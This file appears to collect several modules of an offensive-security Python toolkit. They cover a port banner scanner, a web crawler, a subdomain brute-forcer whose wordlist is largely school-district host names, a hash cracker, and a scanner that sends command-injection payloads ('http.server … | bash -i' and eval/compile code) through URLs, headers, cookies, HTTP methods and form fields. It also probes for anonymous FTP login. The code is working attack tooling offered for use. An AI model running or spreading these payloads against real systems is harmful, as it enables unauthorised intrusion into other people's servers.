import random
import socket
import threading
from TheSilent.clear import clear

CYAN = "\033[1;36m"

def dolphin_thread(host,port):
    global hosts
    tcp_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    tcp_socket.settimeout(10)
    success = False
    try:
        tcp_socket.connect((host,port))
        success = True
        banner = tcp_socket.recv(65536)
        tcp_socket.close()
        hosts.append(f"{port}/tcp- {banner}")
    except:
        if success:
            hosts.append(f"{port}/tcp")
        
def dolphin(host):
    global hosts
    clear()
    print(CYAN + "scanning the top 100 ports")
    hosts = []
    # top 100 ports according to nmap
    port_list = [80,23,443,21,22,25,3389,110,445,139,143,53,135,3306,8080,1723,111,995,993,5900,1025,587,8888,199,1720,465,548,113,81,6001,10000,514,5060,179,1026,2000,8443,8000,32768,554,26,1433,49152,2001,515,8008,49154,1027,5666,646,5000,5631,631,49153,8081,2049,88,79,5800,106,2121,1110,49155,6000,513,990,5357,427,49156,543,544,5101,144,7,389,8009,3128,444,9999,5009,7070,5190,3000,5432,1900,3986,13,1029,9,5051,6646,49157,1028,873,1755,2717,4899,9100,119,37]
    port_list = random.sample(port_list,len(port_list))
    thread_list = []
    for port in port_list:
        my_thread = threading.Thread(target=dolphin_thread,args=(host,port,))
        thread_list.append(my_thread)
        my_thread.start()
    for thread in thread_list:
        thread.join()
    hosts.sort()
    clear()
    return hosts



import re
import time
import urllib.parse
import TheSilent.puppy_requests as puppy_requests
from TheSilent.clear import clear

CYAN = "\033[1;36m"

def kitten_crawler(host,delay=0):
    clear()
    host = host.rstrip("/")
    hosts = [host]
    progress = -1

    try:
        data = puppy_requests.text(f"{host}/robots.txt")
        results = re.findall("http\S+",data)
        for result in results:
            if "sitemap" in result:
                hosts.append(result.split("<")[0])
        results = re.findall("/\S+",data)
        for result in results:
            if not result.startswith("//"):
                hosts.append(f"{host}{result}".split("<")[0])
    except:
        pass

    while True:
        hosts = list(dict.fromkeys(hosts))
        progress += 1
        time.sleep(delay)
        try:
            print(CYAN + hosts[progress])
        except IndexError:
            break
        try:
            data = puppy_requests.text(hosts[progress])
            links = re.findall("href\s?=\s?[\"\'](\S+)[\"\']",data)
            for link in links:
                if link.startswith("http://") and urllib.parse.urlparse(host).netloc in link or link.startswith("https://") and urllib.parse.urlparse(host).netloc in link:
                    if not re.search("script|\'|\"",link.lower()):
                        new_link = link.rstrip("/")
                        hosts.append(link)
                elif link.startswith("/"):
                    if not re.search("script|\'|\"",link.lower()):
                        new_link = f"{host}{link}"
                        new_link = new_link.rstrip("/")
                        hosts.append(new_link)
                elif not link.startswith("http://") and not link.startswith("https://"):
                    if not re.search("script|\'|\"",link.lower()):
                        new_link = f"{host}/{link}"
                        new_link = new_link.rstrip("/")
                        hosts.append(new_link)

            links = re.findall("src\s?=\s?[\"\'](\S+)[\"\']",data)
            for link in links:
                if link.startswith("http://") and urllib.parse.urlparse(host).netloc in link or link.startswith("https://") and urllib.parse.urlparse(host).netloc in link:
                    if not re.search("script|\'|\"",link.lower()):
                        new_link = link.rstrip("/")
                        hosts.append(link)
                elif link.startswith("/"):
                    if not re.search("script|\'|\"",link.lower()):
                        new_link = f"{host}{link}"
                        new_link = new_link.rstrip("/")
                        hosts.append(new_link)
                elif not link.startswith("http://") and not link.startswith("https://"):
                    if not re.search("script|\'|\"",link.lower()):
                        new_link = f"{host}/{link}"
                        new_link = new_link.rstrip("/")
                        hosts.append(new_link)

            links = re.findall("http://\S+|https://\S+",data)
            for link in links:
                if link.startswith("http://") and urllib.parse.urlparse(host).netloc in link or link.startswith("https://") and urllib.parse.urlparse(host).netloc in link:
                    if not re.search("script|\'|\"",link.lower()):
                        new_link = link.rstrip("/")
                        hosts.append(link.split("<")[0])
        except:
            continue

    clear()
    return hosts



import random
import socket
import time
from TheSilent.clear import clear

CYAN = "\033[1;36m"

def kiwi(host,delay=0):
    clear()
    hits = []
    init_hosts = []
    hosts = []

    subdomains = ["aams","accent","accounts","acs-xs","acsamid01","acsnas","adams","adfs","adm","admin","aes","aesdvr1","aggies","ahs","airwatch","akpk","alt","alumni","ams","angel","aovpn","api","aplus","apple","apps","apps2","apps3","aps","arabamid","asas","asg","atriuum","attalla","auth","auth2","autodiscover","av","barracuda","bbb","bcbeiboss2","bcboefilewave","bcrobotics","bcsipmonitor","bes","beverlye","bibbcompass","bibbdestiny","bibbdocumentserver","bigboy","blackboard","block","blocker","blogs","bms-audioe","bsl","butlerco","carver","casarry","cassidy","ccctc","cchs","ccs","ciscoasa","citrix","cl","classlink","classweb","cloverdale","cms","cnp","cobalt","collab-edge","compass","compasslearning","conecuh","cov","cpi","cs-voip","csg","ctcsec","d2l","daleville","dare","datsrv055","dcsamid01","dcsfws","dcsnamidcl","dcsxserve","ddi","decisioned","dell-learn","des","designthefuture","destination","destiny","dialin","discovervideo","dn","docefill","documentservices","donehoo","dothan","dothanhigh","dothantech","dsviewer","e2010","ebes","ecsinow","ecspowerschool","edulog","ees","eforms","email","employeeportal","es","esmoodle","esms","ess","et","etcentral","etcontent","etsecurity","etsts","eurabrown","evans","exchange","expressway","faine","fairview","falcon1","fce","fes","filewave","filter","finance","floyd","forms","fortis","franklin","fs","ftp","gadsdencity-hs","gchs","girard","girardms","gmail","gms","grandview","greene","guac","guac-test","happytimes","hcs-ess","hct","hd","hdcsmtp1","hdctab","heard","helpdesk","henryclay","henryconnects","heritagehigh","hes","hhs","highlands","hms","homewood","honeysuckle","hs","iboss","ibossreporter","icreports","imail","info","infonowweb","inow","inowapi","inowhome","intranet","jasper","jds","jsj-cam","kb","kc","kellysprings","kronmobile","lessonplans","lib","library","links","lms","mail","mail2","mail4","maps","matterhorn","mdm","mdm2","mealapps","media","meet","mes","mitchell","montage","montagebeta","montana","moodle","mta-sts","my","mydocs","myfiles","mypay","mytime","nagios","netview","newmail","nextgen","ngweb","nms","northview","ns","ns1","ns2","nutrition","oaes","oldmail","onlinemealapp","packetview","pandora","parent","parentportal","passwordreset","passwordresetregistration","payday","payroll","pcmon","pdexpress","pinpoint","pop","portal","powerschool","pres","preschool","proxy","proxy2","pssb","pwchange","radius","rds","readydesk","relay","remotesupport","renlearn","reporter","res","rocket","rollcall","router","rp","rsapi","s","safariaves","searchsoft","secure","securityportal","selmast","ses","sets","setsti","setsweb","shssec","sis","slingluff","smtp","smtp-1","smtp1","smtp2","spc","sso","sspr","staffportal","status","stisets","striplin","sts","studentportal","support","swinstall","teacherportal","technology","techweb","techwiki","tes","test","test5","thompson","tickets","tm","tools","transportation","trend","ugms","updates","vpn","walnutpark","webmail","websets","wes","wessec","wiki","williamblount","workorders","wpes","www","www1","www2"]
    subdomains = random.sample(subdomains,len(subdomains))
    for _ in subdomains:
        # check reverse dns
        print(CYAN + f"checking for reverse dns on {_}.{host}")
        dns_host = f"{_}.{host}"
        time.sleep(delay)
        try:
            hits.append(f"reverse dns {_}.{host}: {socket.gethostbyaddr(dns_host)}")
        except:
            pass
        # check if host is up
        print(CYAN + f"checking {_}.{host}")
        try:
            my_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            my_socket.settimeout(1.25)
            my_socket.connect((f"{_}.{host}",80))
            my_socket.close()
            hits.append(f"found {_}.{host}")
        except ConnectionRefusedError:
            hits.append(f"found {_}.{host}")
        except socket.timeout:
            hits.append(f"found {_}.{host}")
        except:
            pass

    clear()
    hits.sort()
    for hit in hits:
        print(CYAN + hit)

    print(CYAN + f"{len(hits)} results")



import re
import socket
import sys
import time
import urllib.parse
from ftplib import FTP,FTP_TLS
from urllib.parse import *
import TheSilent.kitten_crawler as kitten_crawler
import TheSilent.puppy_requests as puppy_requests
from TheSilent.clear import clear
from TheSilent.return_user_agent import return_user_agent

RED = "\033[1;31m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"

def melon(host,delay=0,crawl=False):
    print(CYAN + "")
    clear()

    mal_reverse_shell = ["eval(compile('import http.server,socketserver\nsimple_server = http.server.SimpleHTTPRequestHandler\nwith socketserver.TCPServer((\'\',12345), simple_server) as httpd:\n    httpd.serve_forever()','melon','exec'))",
                         "eval(compile('import http.server,socketserver\nsimple_server = http.server.SimpleHTTPRequestHandler\nwith socketserver.TCPServer((\'\',7777), simple_server) as httpd:\n    httpd.serve_forever()','melon','exec'))",
                         "python3 -m http.server 12345 | bash -i",
                         "python3 -m http.server 7777 | bash -i",
                         "python -m http.server 12345 | bash -i",
                         "python -m http.server 7777 | bash -i",
                         "python3 -m http.server 12345 & bash -i",
                         "python3 -m http.server 7777 & bash -i",
                         "python -m http.server 12345 & bash -i",
                         "python -m http.server 7777 & bash -i",
                         "python3 -m http.server 12345 && bash -i",
                         "python3 -m http.server 7777 && bash -i",
                         "python -m http.server 12345 && bash -i",
                         "python -m http.server 7777 && bash -i"]

    host.rstrip("/")
    init_host = host
    all_forms = []
    hits = []
    port_1 = False
    port_2 = False

    # check for false positives
    print(CYAN + "checking for false positives")
    try:
        tcp_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        tcp_socket.settimeout(10)
        tcp_socket.connect((urllib.parse.urlparse(init_host).netloc,12345))
        hits.append("port 12345 is already open")
        port_1 = True
    except:
        pass

    try:
        tcp_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        tcp_socket.settimeout(10)
        tcp_socket.connect((urllib.parse.urlparse(init_host).netloc,7777))
        hits.append("port 7777 is already open")
        port_2 = True
    except:
        pass

    if port_1 and port_2:
        with open(urllib.parse.urlparse(init_host).netloc,"a") as file:
            for hit in hits:
                file.write(f"{hit}\n")
        for hit in hits:
            print(RED + hit)
        sys.exit()

    if crawl:
        hosts = kitten_crawler.kitten_crawler(init_host,delay)

    else:
        hosts = [init_host]

    for host in hosts:
        try:
            original_page = puppy_requests.text(host)
            all_forms = re.findall("<form[\S\s\n]+/form>",original_page)
        except:
            pass

        # check for reverse shell in url
        print(CYAN + f"checking for reverse shell in url on {host}")
        for mal in mal_reverse_shell:
            try:
                time.sleep(delay)
                data = puppy_requests.text(host + "/" + urllib.parse.quote_plus(mal))
                tcp_reverse_shell = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                tcp_reverse_shell.settimeout(10)
                port = int(re.findall("\d{4,}",mal)[0])
                tcp_reverse_shell.connect((urllib.parse.urlparse(init_host).netloc,port))
                hits.append(f"reverse shell in url ({host}): {mal}")
            except:
                pass
            

        # check for reverse shell in header
        print(CYAN + f"checking for reverse shell in header on {host}")
        for mal in mal_reverse_shell:
            try:
                time.sleep(delay)
                data = puppy_requests.text(host,headers={"Referer":mal})
                tcp_reverse_shell = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                tcp_reverse_shell.settimeout(10)
                port = int(re.findall("\d{4,}",mal)[0])
                tcp_reverse_shell.connect((urllib.parse.urlparse(init_host).netloc,port))
                hits.append(f"reverse shell in header ({host}): {mal}")
            except:
                pass

        # check for reverse shell in cookie
        print(CYAN + f"checking for reverse shell in cookie on  on {host}")
        for mal in mal_reverse_shell:
            try:
                time.sleep(delay)
                data = puppy_requests.text(host,headers={"Cookie":mal})
                tcp_reverse_shell = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                tcp_reverse_shell.settimeout(10)
                port = int(re.findall("\d{4,}",mal)[0])
                tcp_reverse_shell.connect((urllib.parse.urlparse(init_host).netloc,port))
                hits.append(f"reverse shell in cookie ({host}): {mal}")
            except:
                pass

        # check for reverse shell in method
        print(CYAN + f"checking for reverse shell in method on {host}")
        for mal in mal_reverse_shell:
            try:
                time.sleep(delay)
                data = puppy_requests.text(host,method=mal.upper())
                tcp_reverse_shell = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                tcp_reverse_shell.settimeout(10)
                port = int(re.findall("\d{4,}",mal)[0])
                tcp_reverse_shell.connect((urllib.parse.urlparse(init_host).netloc,port))
                hits.append(f"reverse shell in method ({host}): {mal}")
            except:
                pass

        # check for reverse shell in forms
        print(CYAN + f"checking for reverse shell in forms on {host}")
        for mal in mal_reverse_shell:
            if len(all_forms) > 0:
                for form in all_forms:
                    time.sleep(delay)
                    action_bool = True
                    form_names = []
                    mal_value = []
                    try:
                        form_method = re.findall("method\s?=\s?[\"\'](\S+)[\"\']",form)[0]
                        form_input = re.findall("<input.+>",form)
                        for field in form_input:
                            form_name = re.findall("name\s?=\s?[\"\'](\S+)[\"\']",field)[0]
                            form_type = re.findall("type\s?=\s?[\"\'](\S+)[\"\']",field)[0]
                            form_names.append(form_name)
                            if form_type.lower() == "button" or form_type.lower() == "hidden"  or form_type.lower() == "submit":
                                mal_value.append(re.findall("value\s?=\s?[\"\'](\S+)[\"\']",field)[0])

                            else:
                                mal_value.append(mal)

                    except IndexError:
                        pass

                    try:
                        action_tag = re.findall("action\s?=\s?[\"\'](\S+)[\"\']",form)[0]
                        if action_tag.startswith("https://") or action_tag.startswith("http://"):
                            action = action_tag
                        if action_tag.startswith("/"):
                            action = host + action_tag
                        else:
                            action = urllib.parse.urlparse(host).scheme + "://" + urllib.parse.urlparse(host).netloc + "/" + action_tag
                    except IndexError:
                        action_bool = False

                    if action_bool:
                        try:
                            data = puppy_requests.text(action,method=form_method.upper(),data=dict(zip(form_names,mal_value)))
                            tcp_reverse_shell = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                            tcp_reverse_shell.settimeout(10)
                            port = int(re.findall("\d{4,}",mal)[0])
                            tcp_reverse_shell.connect((urllib.parse.urlparse(init_host).netloc,port))
                            hits.append(f"reverse shell in forms ({action}): {dict(zip(form_names,mal_value))}")
                        except:
                            pass

                    else:
                        try:
                            data = puppy_requests.text(host,method=form_method.upper(),data=dict(zip(form_names,mal_value)))
                            tcp_reverse_shell = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                            tcp_reverse_shell.settimeout(10)
                            port = int(re.findall("\d{4,}",mal)[0])
                            tcp_reverse_shell.connect((urllib.parse.urlparse(init_host).netloc,port))
                            hits.append(f"reverse shell in forms ({host})- {dict(zip(form_names,mal_value))}")
                        except:
                            pass

    # check for anonymous ftp bind
    print(CYAN + f"checking for anonymous ftp bind on {host}")
    try:
        ftp = FTP(urllib.parse.urlparse(host).netloc,timeout=10)
        ftp.login()
        ftp.quit()
        hits.append(f"anonymous ftp bind allowed on {host}")
    except:
        pass

    # check for anonymous secure ftp bind
    print(CYAN + f"checking for secure anonymous ftp bind on {host}")
    try:
        ftp = FTP_TLS(urllib.parse.urlparse(host).netloc,timeout=10)
        ftp.login()
        ftp.quit()
        hits.append(f"secure anonymous ftp bind allowed on {host}")
    except:
        pass

    hits = list(set(hits[:]))
    hits.sort()
    clear()
    if len(hits) > 0:
        with open(urllib.parse.urlparse(init_host).netloc,"a") as file:
            for hit in hits:
                file.write(f"{hit}\n")
        for hit in hits:
            print(RED + hit)
    else:
        with open(urllib.parse.urlparse(init_host).netloc,"a") as file:
            file.write("None\n")
        print(GREEN + "None")



import hashlib
import os

def pegasus(init_hash,file):
    words = []
    if os.path.isfile(file):
        with open(file,"r") as f:
            for _ in f:
                words.append(_.replace("\n",""))

    if not os.path.isfile(file):
        files = os.listdir(file)
        for ff in files:
            with open(file + "/" + ff,"rb") as f:
                for _ in f:
                    words.append(_.decode(errors="ignore").replace("\n",""))

    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == init_hash:
            return word

        if hashlib.sha1(word.encode()).hexdigest() == init_hash:
            return word

        if hashlib.sha224(word.encode()).hexdigest() == init_hash:
            return word

        if hashlib.sha256(word.encode()).hexdigest() == init_hash:
            return word

        if hashlib.sha384(word.encode()).hexdigest() == init_hash:
            return word

        if hashlib.sha512(word.encode()).hexdigest() == init_hash:
            return word

        if hashlib.sha3_224(word.encode()).hexdigest() == init_hash:
            return word

        if hashlib.sha3_256(word.encode()).hexdigest() == init_hash:
            return word

        if hashlib.sha3_384(word.encode()).hexdigest() == init_hash:
            return word

        if hashlib.sha3_512(word.encode()).hexdigest() == init_hash:
            return word
